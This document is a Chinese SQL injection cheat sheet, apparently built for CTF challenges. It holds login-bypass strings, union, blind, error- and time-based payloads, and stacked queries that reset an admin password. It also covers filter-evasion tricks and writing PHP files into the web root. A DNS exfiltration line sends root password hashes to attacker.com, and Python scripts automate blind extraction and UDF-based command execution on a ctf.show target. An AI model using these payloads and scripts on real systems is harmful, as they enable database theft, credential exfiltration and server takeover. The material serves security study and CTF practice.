SQL注入

万能密码(注:MySQL 中 `--` 之后必须跟空白字符,URL/表单末尾的空格常被剥离,可写成 `-- -` 或改用 `#`)

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
1'^1# (False注入)

手注

  • 正常注入步骤(联合查询)

    查库名->查表名->查列名(字段名)->查值(数据)

    • 字段数量猜解

      order by 4 --+
    • 判断页面回显数据字段位置

      union select 1,2,3,4,x... --+
    • 数据库名

      -- Current schema, then every schema name; information_schema.schemata is readable by any account, so no extra privilege is needed
      select database()
      select schema_name from information_schema.schemata;

      -- MySQL 8: the TABLE statement (8.0.19+) needs no SELECT keyword; the TABLESPACES_EXTENSIONS view itself appears in 8.0.21+ (hence the ">8.0.21" note in the original)
      table information_schema.TABLESPACES_EXTENSIONS
    • 表名

      -- group_concat() output is cut at @@group_concat_max_len (default 1024 bytes); page with LIMIT or raise the variable if the list looks truncated
      union select 1,2,group_concat(table_name),4,xxxx from information_schema.tables where table_schema=database()
      • union查询

        -- Tables of the current schema only: the WHERE limits it to database() (the original comment claimed "all user databases")
        UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database();   /* tables of the current schema */

        -- VERSION is the .frm file-format version column: 9 for tables created by MySQL 4, 10 for MySQL 5. It is a crude "non-ancient table" filter, not a schema filter
        UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* MySQL-5-format tables from every schema, not only the current one */
        -- Drops the two classic system schemas; on 5.7+ also exclude performance_schema and sys
        SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql';
      • 盲注

        -- NOTE(review): as written this is not valid MySQL — the subquery needs parentheses and must return one row, e.g.
        --   AND (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 1) > 'A'
        AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

        -- MySQL 8.0.19+ TABLE statement; `limit 1,1` selects the second row. Row comparison is column-wise, and BINARY forces a case-sensitive compare on the first column
        and (table information_schema.TABLESPACES_EXTENSIONS limit 1,1)>(BINARY('a'),'0')#
      • 报错

        -- Three error-based extractors chained on one line: (1) the floor(rand(0)*2) duplicate-key error in GROUP BY, (2) the user-variable (@:=) variant, (3) ExtractValue, whose XPath error echoes its argument — only the first 32 characters, so walk longer values with substr()
        AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));
        -- Reported working on 5.1.5 in the original; floor/rand and ExtractValue still error on current 5.x/8.0 builds, the @-variable form is more version-sensitive — NOTE(review): verify on the target
    • 列名(字段名)

      -- Columns of one table in the current schema; always filter on table_schema too, or a same-named table in another schema pollutes the list
      Union select 1,2,group_concat(column_name),4,xxxx from information_schema.columns where table_schema=database() and table_name=(table_name) /* (table_name) is a placeholder: it is a string — quote it, or pass it as a hex literal (0x...) when quotes are filtered */
      • union查询

        -- 'tablename' is a placeholder; without a table_schema filter, tables of the same name in several schemas are merged into one list
        UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
      • 盲注

        -- NOTE(review): not valid MySQL as written — wrap the subquery and make it single-row: AND (SELECT SUBSTR(column_name,1,1) FROM information_schema.columns LIMIT 1) > 'A'
        AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
      • 报错

        -- Reported working on 5.1.5 (the original's note; it appears to refer to the row-comparison trick below)
        -- Row comparison against a subquery with mismatched row count forces an error whose text carries the first row of the table
        AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)
        -- Fixed in MySQL 5.1: later servers no longer echo the row in that error
        -- Same floor(rand)/@-variable/ExtractValue chain as for table names, now over information_schema.columns (ExtractValue still limited to 32 characters per call)
        AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));
    • 值查询

      -- (database_name.) is optional: schema-qualify when the data lives outside database(). Column count (and roughly the types) must match the application's own SELECT
      Union select 1,2,column_name,4,xxx from (database_name.)table_name

      -- MySQL 8.0.19+ TABLE statement; `limit 1,1` picks the second row. The table must have exactly one column, otherwise the comparison fails with an operand-count error
      and (table flag limit 1,1)>(BINARY('a'))#
  • 无回显

    • 盲注
      • 布尔盲注

        使用场景:对真/假条件返回的内容很容易区分

        -- if() yields 1 (row kept) or 0 (row dropped) depending on the first character of admin's stored password
        (where | and) if(substr((select password from users where username='admin'),1,1)='a',1,0)

        -- `nouser` must match no row. It is unquoted here, so MySQL would read it as a column name — write 'nouser' unless such a column exists
        select * from users where username=nouser or length(database())>8
        select * from users where username=nouser or ascii(substr(database(),1,1))<130
      • 时间盲注

        依赖于通过页面返回的延迟时间来判断条件是否正确。

        通常可利用的产生时间延迟的函数有:sleep()、benchmark(),还有许多进行复杂运算的函数也可以当做延迟的判断标准、笛卡尔积合并数据表、GET_LOCK双SESSION产生延迟等方法。

        -- sleep(): MySQL/MariaDB. The delay fires once per row the condition is evaluated on, so the measured time scales with the result set
        (where | and) if(substr((select password from users where username='admin'),1,1)='a',sleep(3),1)

        select * from users where username=$username (and | or) if(length(database())>8,sleep(3),1)

        -- pg_sleep(): PostgreSQL. CASE is used because PostgreSQL has no if(); the second form wraps pg_sleep in a subselect so it is usable as a value
        (and | or) (case when (select substr(password,1,1) from users)='a' then pg_sleep(5) else pg_sleep(0) end)

        and (select case when(substr((select password from users where username='admin'),1,1)='a') then (select 'roarctf' from pg_sleep(3)) else '1' end)='roarctf'

        -- Cartesian-product "heavy query": the delay comes from the join size, no sleep() needed. Every probe burns CPU/IO on the target — keep the product just large enough to measure,
        -- and only against systems you are authorised to test. The rpad()+RLIKE form below is a regex-backtracking (ReDoS-style) load with the same caveat
        select * from users where id=1 and 1>(select count(*) from information_schema.columns A, information_schema.columns B, information_schema.columns C);
        select * from users where id=1 and if(1,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',0) and '1'='1';
    • 报错注入

      通过特殊函数的错误使用使其参数被页面输出。

      前提:服务器开启报错信息返回,也就是发生错误时返回报错信息。

      常见的利用函数有:exp()、floor()+rand()、updatexml()、extractvalue()等。

      -- exp()/pow(): rely on a DOUBLE overflow error whose text includes the offending value; newer 5.7/8.0 builds tend to raise only a warning, so these are version-dependent — NOTE(review): confirm on the target
      (where|and|or) exp(~(select * from(select user())a));
      (where|and|or) pow(~(select * from(select user())a),9999);
      -- updatexml()/extractvalue(): the XPath syntax error echoes the string, but only its first 32 characters — page longer data with substr()
      (where|and|or) updatexml(1,concat(0x7e,(select user()),0x7e),1);
      (where|and|or) extractvalue(1,concat(0x7e,(select user()),0x7e));
      -- floor/ceil(rand(0)*2): duplicate GROUP BY key error that names the key; needs a source with at least 3 rows (information_schema.tables always qualifies)
      (where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)));
      (where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,ceil(rand(0)*2)));
    • limit注入

      使用 PROCEDURE ANALYSE 子句进行注入,ANALYSE 支持两个参数。注意:PROCEDURE ANALYSE 自 MySQL 5.7.18 起弃用,8.0 已移除,仅对旧版本有效。

      -- PROCEDURE ANALYSE(): deprecated in MySQL 5.7.18, removed in 8.0 — only older servers accept it after LIMIT
      select id from users order by id desc limit 0,1 procedure analyse(1,1);
      -- Error-based variant: extractvalue() inside ANALYSE echoes version() in the error text
      select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
      -- INTO OUTFILE after LIMIT needs the FILE privilege, secure_file_priv empty (or covering the path) and a path the mysqld OS user can create (existing files are refused); "0x16进制文件" stands for the hex of the file body appended to every row
      select id from users order by id desc limit 0,1 into outfile "/var/www/html/1.php" LINES TERMINATED BY 0x16进制文件
    • update注入
      -- blind, inside the SET clause: 0x5e5b6d2d7a5d is the regexp '^[m-z]'. `'0' | expr` coerces to an integer, so the column is overwritten with 0/1 — destructive for the matched rows, and sleep() fires once per matched row
      update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
      update users set username = '0' | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;
    • insert注入
      -- blind, inside VALUES: 0x5e5b6d2d7a5d is the regexp '^[m-z]'; the inserted value is the 0/1 result of the test (time-based in the first form, boolean in the second). Each probe leaves a new row behind
      insert into users values (16,'K0rz3n','0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));
      insert into users values (15,'K0rz3n','0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));
    • order by注入
      -- error-based in ORDER BY: quotes cannot close this context, so only error/delay functions work. `%20` here is a URL-encoded space pasted into SQL — send a real space (the encoding belongs on the HTTP layer only)
      select * from users order by updatexml(1,concat(0x7e,(select%20user()),0x7e),1);
    • group by注入
      -- blind in GROUP BY/HAVING: HAVING accepts an arbitrary condition, so the result set toggles with the guess
      select * from users group by 1 having substr((select database()),1,1)='c'
  • 宽字节注入

    国内最常使用的 GBK 编码,这种方式主要用于绕过 addslashes 等对特殊字符进行转义的函数。反斜杠 \ 的十六进制为 %5c,当你输入 %bf%27 时,函数遇到单引号自动转义加入 \,此时变为 %bf%5c%27;而 %bf%5c 在 GBK 中会被解释为一个宽字符「縗」,单引号因此被"释放"出来。%bf 那个位置可以是 %81-%fe 中间的任何字节。不止在 SQL 注入中,宽字节注入在很多地方都可以应用。前提是连接字符集为 GBK(如 SET NAMES gbk)且转义函数不感知该字符集;使用 mysql_set_charset('gbk') 配合 mysql_real_escape_string,或直接使用预处理语句,即可防御。

    GET方式:利用URLencode ?id=1%df'||1={payload}%23

    POST方式:利用UTF-16或UTF-32或中文 ?id=1我'||1={payload}#

  • 堆叠注入

    由于分号 ; 为 MySQL 语句的结束符,若驱动/接口支持多语句执行(如 PHP 的 mysqli_multi_query、PDO_MySQL 默认允许的多语句),可利用此方法执行其他恶意语句,如 RENAME、DROP、UPDATE 等;单语句接口(如 mysql_query)下堆叠注入不可用。

    -- Each payload opens with `1;` to finish the application's own query; the trailing `#` comments out whatever the app appends after the injection point
    1;show databases;#
    1;show tables;#
    1;show columns from [表名];#

    -- Hex literals dodge quote filters: 0x31323334 = '1234', 0x61646d696e = 'admin'
    1;update`ctfshow_user`set`pass`=(0x31323334)where(username=0x61646d696e)

    /* Prepared statements: the SQL text is assembled from char()/hex, so keyword filters on the raw input see nothing.
       Both char(...) and 0x7570... decode to exactly the UPDATE on the line above */
    1;PREPARE hacker from char(117,112,100,97,116,101,96,99,116,102,115,104,111,119,95,117,115,101,114,96,115,101,116,96,112,97,115,115,96,61,40,48,120,51,49,51,50,51,51,51,52,41,119,104,101,114,101,40,117,115,101,114,110,97,109,101,61,48,120,54,49,54,52,54,100,54,57,54,101,41);EXECUTE hacker;#
    1;PREPARE hacker from 0x7570646174656063746673686f775f75736572607365746070617373603d283078333133323333333429776865726528757365726e616d653d30783631363436643639366529;EXECUTE hacker;#

    /* Same via a user variable, for a string-quoted injection point (hence the leading 1') */
    1';SET @sqli=char(117,112,100,97,116,101,96,99,116,102,115,104,111,119,95,117,115,101,114,96,115,101,116,96,112,97,115,115,96,61,40,48,120,51,49,51,50,51,51,51,52,41,119,104,101,114,101,40,117,115,101,114,110,97,109,101,61,48,120,54,49,54,52,54,100,54,57,54,101,41);PREPARE hacker from @sqli;EXECUTE hacker;#
    1';SET @sqli=0x7570646174656063746673686f775f75736572607365746070617373603d283078333133323333333429776865726528757365726e616d653d30783631363436643639366529;PREPARE hacker from @sqli;EXECUTE hacker;#
  • 二次注入

    攻击者构造的恶意数据存储到数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。

    现在通常 Web 应用程序大多都会进行参数过滤来防止注入。如果某处在过滤之后又调用了 urldecode() 或 rawurldecode() 函数,则二次解码会还原出单引号而引发注入,即"二次 urldecode 注入"——它与严格意义上的二次注入(恶意数据先入库、再被读出拼接进 SQL)成因不同,但常被放在一起讨论。

    Web 应用程序通常使用 addslashes()、mysql_real_escape_string()、mysql_escape_string() 函数或者开启 GPC 来防止注入,也就是给单引号(')、双引号(")、反斜杠(\)和 NULL 字节加上反斜杠转义。

    addslashes 函数虽然会添加 \ 进行转义,但 \ 作为转义符会被 SQL 解析器消耗,并不会随数据存入数据库;当这些数据再次被读出并拼接进 SQL 时已不再带有转义,这正是二次注入的根源。

    • 二次urldecode注入

      单引号:%25%27

      双引号:%25%22

  • 文件操作

    读文件:

    -- LOAD_FILE() needs the FILE privilege and a path permitted by secure_file_priv; it returns NULL without an error when the file is unreadable or larger than max_allowed_packet
    SELECT LOAD_FILE('/etc/passwd')

    -- Hex form of the path when quotes are filtered: 0x2f666c6167 = '/flag'
    SELECT LOAD_FILE(0x2f666c6167)

    写文件:

    -- INTO OUTFILE needs the FILE privilege, secure_file_priv empty (or covering the path), a directory writable by the mysqld OS user and a file that does not exist yet; the web server must also serve that directory for the dropped PHP to execute
    SELECT '<?php phpinfo();?>' into outfile '/var/www/html/phpinfo.php'

    -- LINES TERMINATED BY appends arbitrary bytes to every row; "0x16进制文件" stands for the hex of the file body
    select version() into outfile "/var/www/html/test.php" LINES TERMINATED BY 0x16进制文件

绕过(bypass)

  • 空格

    1. 多层括号嵌套
    2. 改用+号
    3. 使用注释代替(/*注释内容*/、/*! MYSQL专属*/)
    4. and/or 后面可以跟上偶数个 ! 或 ~ 来替代空格,也可以混合使用(规律有所不同),and/or 前的空格可以省略
    5. %09、%0a、%0b、%0c、%0d、%a0 等部分不可见字符也可代替空格
  • 单双引号

    1. 需要跳出单引号的情况:尝试是否存在编码问题而产生的SQL注入。
    2. 不需要跳出单引号的情况:字符串可用16进制表示、也可通过进制转换函数表示成其他进制。
    -- hex literal: 0x61646D696E = 'admin' (MySQL treats it as a binary string, which still compares against a VARCHAR column)
    SELECT * FROM Users WHERE username = 0x61646D696E
    -- CHAR() builds the same string byte by byte: CHAR(97,100,109,105,110) = 'admin'
    SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
  • 逗号

    1. 采用 substr((database())from({})for(1)) 的形式
    2. 采用join:union select * from ((select 1)a join (select 2)b join (select 3)c);
  • 等号 / like

    1. regexp或者in
    2. <>
  • and / or

    1. 双写anandd、oorr
    2. 使用运算符代替&&、||
    3. 直接拼接=号,如:?id=1=(condition)
    4. 其他方法,如:?id=1^(condition)、?id=1)xor(condition)
  • union

    1. 盲注:'and(select pass from users limit 1)='secret
  • select

    1. 有文件读取权限

      -- No SELECT keyword in the payload: it rides on the application's own SELECT. load_file() reads a config file (e.g. the Apache vhost), locate() finds "DocumentRoot" and the 10 characters after it are compared blind, one guess per request; the trailing INTO OUTFILE dumps the app's result set to a web-readable file. Both halves need the FILE privilege
      ' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+
      length('DocumentRoot'),10)='a'='' into outfile '/var/www/dump.txt
    2. 获取列名

      -- Column-name discovery without SELECT: a guessed name that does not exist raises "Unknown column", an existing one does not
      ' and 列名 is not null#
      -- PROCEDURE ANALYSE() prints column names in its output (older servers only; removed in MySQL 8.0)
      ' procedure analyse()#
      'and substr(pass,1,1)='a /* substr() on the guessed column doubles as a blind probe of its values */
    3. handler语句代替select查询

      /* Read the users table row by row with HANDLER instead of SELECT (MySQL/MariaDB only).
         HANDLER talks to the storage engine directly, so SELECT-keyword filters do not apply; the account still needs
         SELECT privilege on the table, and an unclosed handle keeps the table open for the session. */
      handler users open as yunensec; /* open the table and name the handle */
      handler yunensec read first; /* first row */
      handler yunensec read next; /* following row */
      handler yunensec read next; /* following row */
      ...
      handler yunensec close; /* release the handle */
  • limit

    -- Select a single row without LIMIT: a selective WHERE, GROUP BY ... HAVING, or HAVING on the value itself. The last form only works when exactly one row satisfies the HAVING, otherwise the scalar subquery errors
    'and(select pass from users where id=1)='a
    'and(select pass from users group by id having id=1)='a
    'and length((select pass from users having substr(pass,1,1)='a'))
  • where

    1. join/left join/right join...on...
  • information_schema

    1. 替代表:sys.x$schema_flattened_keys、sys.schema_table_statistics(需 MySQL 5.7+,且账号对 sys/performance_schema 有 SELECT 权限;只列出被访问过的表)
  • 其他关键字

    1. 双写绕过关键字过滤

      1. 使用同义函数/语句代替,如if函数可用case when condition then 1 else 0 end语句代替。

      2. 使用 CONCAT() 时,任一参数为 NULL 则整体返回 NULL,推荐使用 CONCAT_WS();CONCAT_WS() 函数第一个参数表示用哪个字符间隔所查询的结果,并且会跳过 NULL 参数。

         -- adjacent string literals are concatenated by the parser — no function name to filter
         SELECT 'a' 'd' 'mi' 'n';
        -- CONCAT() returns NULL as soon as any argument is NULL
        SELECT CONCAT('a', 'd', 'm', 'i', 'n');
        -- CONCAT_WS(sep, ...) skips NULL arguments; an empty separator gives plain concatenation
        SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
        -- GROUP_CONCAT over the single implicit row also yields 'admin'; output is capped by group_concat_max_len
        SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');
  • 括号

    1. order by 大小比较盲注
  • 数字

    1. true 代替 1:用 (true)+(true)+... 累加可得到任意正整数,下面的脚本用于生成该表达式

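      def cal(x):
          """Build a MySQL integer literal equal to ``x`` without using digits.

          Digit filters are bypassed by summing ``x`` copies of ``(true)``:
          ``cal(2) == '((true)+(true))'``.

          Args:
              x: the integer to express (number of ``(true)`` terms).

          Returns:
              A parenthesised sum of ``x`` ``(true)`` terms. For ``x <= 0`` it
              returns ``'(false)'`` (the original slicing produced the
              unbalanced string ``')'`` in that case).
          """
          if x <= 0:
              return '(false)'
          return '(' + '+'.join(['(true)'] * x) + ')'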
    2. 替换表

数字替换表(字母列为该数值对应的 36 进制字符,如 conv(10,10,36)='A';含 version() 的表达式按 MySQL 5.x 计算,其他大版本需重新核对):

| 代替 | 字符 | 代替 | 字符 | 36进制 | 代替 | 字符 | 36进制 |
|---|---|---|---|---|---|---|---|
| false、!pi() | 0 | ceil(pi()*pi()) | 10 | A | ceil((pi()+pi())*pi()) | 20 | K |
| true、!(!pi()) | 1 | ceil(pi()*pi())+true | 11 | B | ceil(ceil(pi())*version()) | 21 | L |
| true+true | 2 | ceil(pi()+pi()+version()) | 12 | C | ceil(pi()*ceil(pi()+pi())) | 22 | M |
| floor(pi())、~~pi() | 3 | floor(pi()*pi()+pi()) | 13 | D | ceil((pi()+ceil(pi()))*pi()) | 23 | N |
| ceil(pi()) | 4 | ceil(pi()*pi()+pi()) | 14 | E | ceil(pi())*ceil(version()) | 24 | O |
| floor(version()) //注意版本 | 5 | ceil(pi()*pi()+version()) | 15 | F | floor(pi()*(version()+pi())) | 25 | P |
| ceil(version()) | 6 | floor(pi()*version()) | 16 | G | floor(version()*version()) | 26 | Q |
| ceil(pi()+pi()) | 7 | ceil(pi()*version()) | 17 | H | ceil(version()*version()) | 27 | R |
| floor(version()+pi()) | 8 | ceil(pi()*version())+true | 18 | I | ceil(pi()*pi()*pi()-pi()) | 28 | S |
| floor(pi()*pi()) | 9 | floor((pi()+pi())*pi()) | 19 | J | floor(pi()*pi()*floor(pi())) | 29 | T |
  • sys系统库

    # sys schema (MySQL 5.7.7+): its views read performance_schema, so they are a fallback when information_schema is filtered.
    # They only list objects touched since the server started, and the account needs SELECT on sys/performance_schema.
    # all schemas:
    SELECT table_schema FROM sys.schema_table_statistics GROUP BY table_schema;
    SELECT table_schema FROM sys.x$schema_flattened_keys GROUP BY table_schema;

    # tables of one schema (absence means the table has never been accessed, not that it does not exist):
    SELECT table_name FROM sys.schema_table_statistics WHERE table_schema='mspwd' GROUP BY table_name;
    SELECT table_name FROM sys.x$schema_flattened_keys WHERE table_schema='mspwd' GROUP BY table_name;

    # access count per table: schema, table, reads+writes
    select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;

    # every connected session: user@host, current schema, state (Sleep = idle), statement running now, previous statement, connection age in seconds.
    # Other users' statements may contain credentials or application secrets — handle the output accordingly.
    SELECT user,db,command,current_statement,last_statement,time FROM sys.session;

    # every host that ever connected, with its total connection count
    SELECT host,total_connections FROM sys.host_summary;

    # statement digests: normalised SQL text, execution counts and latencies
    SELECT * from sys.x$statement_analysis;
  • mysql系统库

    # tables of the current schema from InnoDB's persistent statistics — needs SELECT on the mysql schema; non-InnoDB tables do not appear and the stats can lag behind recent DDL
    select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()
  • 无列名注入(or被过滤)

    -- "no column name" injection: the first SELECT names the columns 1,2,3 by position, so the backticked `2` is the second column of user, whatever it is really called
    select group_concat(`2`) from (select 1,2,3 union select * from user)x;
    -- row comparison: (1,'ae',0) > (first row of user) is a boolean oracle on the second column, again without knowing its name
    select ((select 1,'ae',0)>(select * from user));
    -- error-based column discovery: self-joining a table raises "Duplicate column name '<col>'"; listing the columns already found in USING() makes the error name the next one
    ?id=-1' union all select * from (select * from users as a join users b using(id,username))c--+

DNS带外注入(OOB)

out-of-band带外数据(OOB)与inband相反,它是一种通过其他传输方式来窃取数据的技术(例如利用DNS解析协议和电子邮件)。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求,然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则,即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器(DNS)中提取数据,则被认为是最隐蔽有效的方法。

利用原理:

img

利用条件:

需要Windows环境

1、DBMS中需要有可用的,能直接或间接引发DNS解析过程的子程序,即使用到UNC

2、Linux没有UNC路径,所以当处于Linux环境,不能使用该方式获取数据

工具:

DNSLog.cn

CEYE

# secure_file_priv must be '' (empty) or a directory that covers the path; NULL disables LOAD_FILE()/OUTFILE entirely.
# From 5.5.53 / 5.6.34 / 5.7.6 the default is restrictive (NULL or a fixed directory depending on the build) — NOTE(review): confirm the default for the target version
# check it:
select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv";

# injection: '\\\\' in a quoted literal is two backslashes after escape processing, giving the UNC path \\<data>.attacker.com\foobar;
# Windows resolves that host through DNS before attempting SMB, which is the exfil channel (Windows only, see above).
# DNS limits apply: each label <= 63 chars and the whole name <= 253, so hex() or substr() longer values. mysql.user.password is gone from 5.7 on (authentication_string).
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));
# hex form: 0x5c5c5c5c is a raw 4-byte literal (hex literals are not escape-processed, so this is four backslashes; 0x5c5c is the canonical prefix — NOTE(review): verify which the target accepts);
# the long literal is '.b88b0d7e532b8f6531d2.d.zhack.ca\\a.txt'
select load_file(concat(0x5c5c5c5c,(select database()),0x2E62383862306437653533326238663635333164322E642E7A6861636B2E63615C5C612E747874));

UDF

UDF 是 MySQL 的一个拓展接口,UDF(User Defined Function)可翻译为用户自定义函数,是用来拓展 MySQL 的技术手段。当我们有文件读取和写入权限(FILE 权限、secure_file_priv 为空、能向 plugin_dir 写入)以后,就可以尝试使用 UDF 提权的方法,从数据库的 root 权限提升到操作系统层面的命令执行;所用的 .so/.dll 必须与目标 MySQL 的架构和位数一致。

参考:

Mysql UDF 提权

MySQL UDF提权十六进制查询

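# Reference script
# Environment: Linux / MariaDB 10.3.18, stacked-query injection through the `id` parameter.
# Flow: stage the UDF .so into a table in hex chunks, dump it into plugin_dir,
# CREATE FUNCTION sys_eval, run a command and read the output back through the app.
import requests

# Injection point: everything after `?id=` is attacker-controlled.
url = 'http://15700a19-71aa-4c90-b3ca-b6db9d77c56d.chall.ctf.show/api/?id='
# Hex encoding of the compiled udf.so (the literal was stripped from this copy of the page; fill it in).
code = ''

# Split into 128-hex-char (64-byte) pieces so each request stays short.
CHUNK = 128
codes = [code[i:i + CHUNK] for i in range(0, len(code), CHUNK)]


def run(sql):
    """Send one stacked statement through the injection point and return the response."""
    # `0';` closes the app's own value/statement, `-- A` comments out the tail.
    payload = "0';{};-- A".format(sql)
    return requests.get(url + payload)


if not codes:
    raise SystemExit('code is empty: paste the hex of udf.so first')

# Staging table, created once (left commented in the original; re-running errors on an existing table).
# run('create table temp(data longblob)')

# Empty the staging table.
run('delete from temp')

# Insert the first chunk, then append the rest with concat() so the blob is rebuilt in order.
run('insert into temp(data) values (0x{})'.format(codes[0]))
for piece in codes[1:]:
    run('update temp set data = concat(data,0x{})'.format(piece))

# 10.3.18-MariaDB: write the blob into plugin_dir. Needs the FILE privilege, secure_file_priv empty
# and the directory writable by the mysqld OS user; check `select @@plugin_dir` if the path differs.
run("select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so'")

# Register the UDF; the .so must be built for the same architecture as the server.
run("create function sys_eval returns string soname 'udf.so'")

# Execute a command and park its output in a column the web UI displays.
run("update ctfshow_user set pass=(select sys_eval('cat /flag.her?'))")

# Read the result back through the listing endpoint (drop the trailing `?id=`).
base = url.rsplit('?', 1)[0]
r = requests.get(base + '?page=1&limit=10')
print(r.text)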

NoSQL

常用脚本

  • 布尔盲注

    import string
    import requests

    # Candidate characters, tried in this order at every position.
    dic = '{}-_' + string.digits + string.ascii_lowercase

    url = 'xxxxxxx'          # target login endpoint
    now = ''                 # recovered prefix so far
    for i in range(1, 50):   # position being recovered (1-based, like substr())
        for j in dic:
            # Boolean-condition template; substitute `i`, `j`/`now` into it.
            payload = '''xxxxxxx'''.format()
            #print(payload)
            data = {'username': payload, 'password': 'xxxxx'}
            r = requests.post(url, data=data)
            #print(r.text)
            # Marker text that appears only when the condition holds.
            if 'xxx' in r.text:
                now += j
                print(now)
                break
        else:
            # No candidate matched at this position: value fully recovered (or the marker is wrong).
            break
    import requests

    url = "xxx"

    result = ''   # recovered value
    i = 0         # 1-based character position

    while True:
        i += 1
        # Binary search over printable ASCII (32..126) for the character at position i.
        lo, hi = 32, 127
        while lo < hi:
            mid = (lo + hi) >> 1
            # Alternatives for enumerating the `ctfshow` schema's tables / columns:
            # payload = f'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
            # payload = f'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},1,0)%23'
            payload = f'if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0)%23'
            # NOTE(review): sent through params=, the `%23` is percent-encoded again and reaches
            # the server literally; MySQL then parses `0)%23||('0'` as a modulo, which happens to stay valid.
            data = {
                'id': f"100')||{payload}||('0"
            }
            r = requests.get(url, params=data)
            # r = requests.post(url,data=data)
            if "xxx" in r.text:   # marker present => char > mid
                lo = mid + 1
            else:
                hi = mid
        # lo == 32 means no printable character was found: end of the value.
        if lo == 32:
            break
        result += chr(lo)
        print(result)

  • 时间盲注

    import requests
    import string
    import time

    # Candidate characters, tried in this order at every position.
    dic = '{}-_,' + string.ascii_lowercase + string.digits

    url = 'xxxxxx'
    now = ''   # recovered prefix so far
    for i in range(1, 50):
        for j in dic:
            started = time.time()
            # Condition template: delay (e.g. sleep()) only when character i equals j.
            payload = '''xxxxxx'''.format()
            data = {'ip': payload, "debug": 0}
            r = requests.post(url, data=data)
            elapsed = time.time() - started
            # Wall-clock round trip over 1s => condition true; network jitter counts too.
            if elapsed > 1:
                now += j
                print(now)
                break
        else:
            # Nothing matched at this position: stop.
            break
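    import requests

    # Injection point: `?id=1"and ` (URL-encoded); the payload is appended verbatim.
    url = "http://xxx/?id=1%22and%20"

    result = ''   # recovered value
    i = 0         # 1-based character position

    # Time-based oracle: sleep(0.6) fires when the condition is true and the 0.5s client
    # timeout turns that into a Timeout exception. The 0.1s margin is thin on slow links.
    while True:
        i = i + 1
        head = 32
        tail = 127

        while head < tail:
            mid = (head + tail) >> 1
            # Alternatives for enumerating schema `yyy`'s tables / columns:
            # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="yyy")),{i},1))>{mid},sleep(0.6),0)%23'
            # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="yyy")),{i},1))>{mid},sleep(0.6),0)%23'
            payload = f'if(ascii(substr((select/**/group_concat(xxx)from(yyy.zzz)),{i},1))>{mid},sleep(0.6),0)%23'

            try:
                # data = {
                #     'uname': f"admin')and {payload}#",
                #     'passwd': '1'
                # }
                r = requests.get(url + payload, timeout=0.5)
                # r = requests.post(url, data=data, timeout=0.5)
                tail = mid            # answered in time => char <= mid
            except requests.exceptions.Timeout:
                head = mid + 1        # timed out => char > mid
            # Any other failure (DNS error, connection refused, Ctrl-C) now propagates instead of
            # being misread as a "true" branch, which the original bare `except:` did.

        if head != 32:
            result += chr(head)
        else:
            break
        print(result)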